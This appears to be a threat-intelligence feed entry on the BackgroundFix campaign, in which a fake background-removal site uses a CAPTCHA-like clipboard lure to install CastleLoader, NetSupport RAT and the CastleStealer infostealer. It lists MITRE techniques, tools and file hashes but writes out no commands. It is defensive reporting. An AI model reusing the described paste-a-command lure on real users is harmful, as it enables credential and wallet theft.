Back

Malicious Background Removal Tool Distributes RATs and Infostealers

Severity: High (Score: 72.5)

Sources: Huntress, Cybernews

Summary

A new cyber threat identified by Huntress involves a fake background removal website that tricks users into executing malicious commands. Dubbed BackgroundFix, this site masquerades as a free image-editing service, targeting individuals who may not have established tools for photo editing. The attack initiates when users interact with a CAPTCHA-like checkbox, which leads to a command being copied to their clipboard. This command installs CastleLoader, which subsequently drops the NetSupport RAT and a custom infostealer known as CastleStealer. CastleStealer is designed to harvest sensitive information, including saved passwords and session files. The campaign is ongoing, with multiple domains identified using the same malicious template. Users are advised to avoid copy-paste verification prompts and to be cautious with unfamiliar web tools. Key Points: • BackgroundFix masquerades as a legitimate photo editing tool to distribute malware. • The attack uses social engineering tactics to execute malicious commands on victims' systems. • CastleStealer targets sensitive data, including passwords and crypto wallet information.

Key Entities

  • Malware (attack_type)
  • Phishing (attack_type)
  • BackgroundFix (campaign)
  • Cwe-327 - Use Of A Broken Or Risky Cryptographic Algorithm (cwe)
  • python.org (domain)
  • CastleLoader (malware)
  • CastleStealer (malware)
  • NetSupport RAT (malware)
  • NetSupportRAT (malware)
  • T1003 - OS Credential Dumping (mitre_attack)
  • T1027 - Obfuscated Files Or Information (mitre_attack)
  • T1055.012 - Process Hollowing (mitre_attack)
  • T1059.003 - Windows Command Shell (mitre_attack)
  • T1059 - Command and Scripting Interpreter (mitre_attack)
  • Chrome (tool)
  • Python (tool)
  • Curl (tool)
  • Finger (tool)
  • Finger.exe (tool)
  • Chromium (platform)
  • Linux (platform)
  • Windows (platform)
  • bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92 (sha256)
  • ed391a16389234f9ebb6727711baaf3e068d7f77c465708fa3e8b7d0565d7fb9 (sha256)
Loading threat details...

Threat Not Found

The threat cluster you're looking for doesn't exist or has been removed.

Return to Feed